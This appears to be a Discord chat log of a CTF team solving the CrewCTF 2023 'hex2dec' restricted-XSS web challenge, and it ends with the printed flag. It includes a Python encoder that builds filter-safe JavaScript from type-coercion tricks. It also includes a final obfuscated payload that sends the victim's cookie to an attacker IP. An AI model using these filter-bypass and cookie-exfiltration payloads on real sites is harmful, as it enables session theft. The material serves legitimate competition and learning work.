Project Sekai
🔒 CrewCTF 2023 / ✅-web-hex2dec
Sutx pinned a message to this channel. 07/08/2023 10:01 AM
@irogir wants to collaborate 🤝
apparently using compose is too much to ask for
@ElleuchX1 wants to collaborate 🤝
10:14
@Zafirr wants to collaborate 🤝
the regex is wrong?
10:15
we can use stuff like @, _, [, ]
10:16
<b>ABCD this works
10:16
idk how to get full xss though, stuff like = is banned
10:17
nvm = works, () doesn't
yes the second minus is not escaped
10:22
ok we have enough chars to build a js payload
nice, gl
10:23
I'm not experienced enough in this xd
10:29
csp msfrog
unsafe-inline, this chall feels like a JS jail
truly (edited)
most annoying thing is parentheses blocked
10:36
the uppercase is also annoying
true, but we can use hex chars; we need some primitive to call functions / build strings without using eval
10:39
we have backticks and could use them to pass args, but can't use octal escape sequences
would <SCRIPT SRC=> work?
10:42
don't need the backticks
would bypass the blacklist, but violates the CSP policy default-src 'none'
so we would need to get something like: document.loc = exfil + cookies
would there be a way to traverse the dom from just [] maybe?
10:47
[]['xxx']['xxx'] and so on
10:51
doesn't seem so
yeah i was trying to inject a tag with an id whose identifier we then access via js to reach document or window
10:55
but unsuccessful so far
ok there is a.ownerDocument.location
docker updated for hex2dec, the changes do not affect the solution but we request you to still redownload the files to reproduce locally
Replying to irogir: ok there is a.ownerDocument.location
ok problem reduced to gen arb strings
11:12
what about document.cookie though
Replying to irogir: ok there is a.ownerDocument.location
this returns the document
11:14
ok so we have `
11:14
i think we can use binary ops to get required chars
rip we missed the first blood 😅
yes i suck at js
11:24
NaN + [] we can get N with that
oh yea we can use +
and JSON + [] = [object JSON] (str)
yeah tons of strings
11:25
just need to grind
11:25
for each letter
11:25
i think you got this, gn
11:27
also i think if you just get "toLower" it should be faster
11:27
just need t,o,w,r
11:27
then you could do like `OWNER`[`toLower`]`` (edited)
yep cyu
@jayden wants to collaborate 🤝
ok have location : (([] == {})+[])[2]+({} + [][0])[1]+({} + [][0])[5]+(([] == {})+[])[1]+({} + [][0])[6]+({} + [][0])[20]+({} + [][0])[1]+({} + [][0])[16]
11:36
need to go now ~20m
ok playing box now, but if someone has time: one can get all chars with baseURI nodelement (edited)
how close is this msfrog
12:13
gl
@Legoclones wants to collaborate 🤝
alright gonna take a look at this now
13:11
looks like you've got a great start
13:11
lets see
okay I'm confused
13:22
I can't get any ( in there (edited)
Replying to irogir: ok have location : (([] == {})+[])[2]+({} + [][0])[1]+({} + [][0])[5]+(([] == {})+[])[1]+({} + [][0])[6]+({} + [][0])[20]+({} + [][0])[1]+({} + [][0])[16]
how does that work?
13:23
like can u share link?
that's a temp payload; you can get (x) with [x][0] as a string
13:24
i can join in a few minutes
okay yeah when u get on lmk cuz I'm still confused lol
13:31
and we have to wrap our payload in <IMG ONLOAD=>, right? because a <script> tag placed after page load won't be run
Replying to Legoclones: okay yeah when u get on lmk cuz I'm still confused lol
okay so what I meant is that instead of (([] == {})+[]) to gen the false string, we can do [[[]==[]]+[]]
13:35
this gives us an arr with false str
also we can't use {} I don't think
Replying to Legoclones: and we have to wrap our payload in <IMG ONLOAD=>, right? because a <script> tag placed after page load won't be run
it shouldn't matter I think, preparing payload
Replying to Legoclones: also we can't use {} I don't think
yes it's blocked
13:37
I enumerated the builtins we can use: CSS, JSON and NaN
wait []==[] is false 👀 javascript lol
Replying to irogir: [attachment]
so goal is to inject an element with an id we can access from js globals
13:38
<a ID=a>
13:38
then call a[ownerDocument] to get document reference
13:39
1s I had smth earlier
13:40
this is the url for redirect to static url
13:40
just need to find cookie
13:41
the script I used for generating stuff:
```python
# Build a map from each character to a JS expression that evaluates to
# that character using only the characters the filter lets through.
rmap = {}

# Characters that can simply be written as a one-char template literal
# (uppercase letters, digits, hex a-f, ':' and '?').
r = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdef:?"
for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = f"`{c}`"

# Characters that are allowed verbatim.
r = "=;"
for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = c

# [[[]==[]]+[]][0] == "false"  ([] == [] is false, +[] stringifies it)
r = "false"
for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = "[[[]==[]]+[]][0][%d]" % (i)

# [JSON+[][1]][0] == "[object JSON]undefined"
r = "[object JSON]undefined"
for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = "[JSON+[][1]][0][%d]" % (i)

# a.baseURI (the injected <a ID=a> element) == the challenge URL, which
# gives us the remaining lowercase letters and '/', '.', '-'.
# "baseURI" itself is spelled with the pieces above ('s' is "false"[3]).
r = "http://hex2dec-web.chal.crewc.tf:8084/"
for i, c in enumerate(r):
    if c not in rmap:
        rmap[c] = "a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][%d]" % (i)

# Strings that were encoded during the session; the last assignment wins.
target = "d=a[parentNode][parentNode][parentNode][parentNode];;;; d[location] = http:/ip:9000?a="  # d[cookie]
target = "http://ip:9000?a="
target = "baseURI"
target = "parentNode"
target = "location"
target = "http://lol.de"

# Emit the concatenation of per-character expressions.
parts = []
for ch in target:
    if ch not in rmap:
        raise Exception("not in rmap: ", ch)
    parts.append(rmap[ch])
print("+".join(parts))
```
ok I think we can abuse that the tag gets lower cased when using outerHTML(?)
I'm getting an empty cookie, weird
14:13
httponly flag set
14:13
i mean not set
@Legoclones can you test whether this works in your console
14:25
a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][0]+[JSON+[][1]][0][6]+[JSON+[][1]][0][6]+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`:`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][5]+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][5]+`8`+`7`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][18]+`1`+`5`+`5`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][18]+`1`+`6`+`8`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][18]+`2`+`4`+`6`+`:`+`9`+`0`+`0`+`1`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][5]+`:`+`a` + `b` + a[a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][3]+`a`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`e`+[JSON+[][1]][0][14]+[JSON+[][1]][0][6]+`N`+[JSON+[][1]][0][1]+`d`+`e`][`c`+[JSON+[][1]][0][1]+[JSON+[][1]][0][1]+e[[JSON+[][1]][0][1]+[JSON+[][1]][0][13]+[JSON+[][1]][0][6]+`e`+a[`b`+`a`+[[[]==[]]+[]][0][3]+`e`+`U`+`R`+`I`][25]+`H`+`T`+`M`+`L`][1]+[JSON+[][1]][0][18]+`e`]
14:25
set document.cookie before
14:38
enc issues
irogir used /ctf solve
✅ Challenge solved.
strong
crew{dom_clobbering_is_helpful_for_a_restricted_xss} where DOM clobbering?
niceeeeee
14:59
idk, maybe u unintended??
prob intended i think?
maybe they meant that one had to use the DOM to get access to document, but that's not DOM clobbering lol
Irogir too strong
00:11
Come unintend the other web as well 😵💫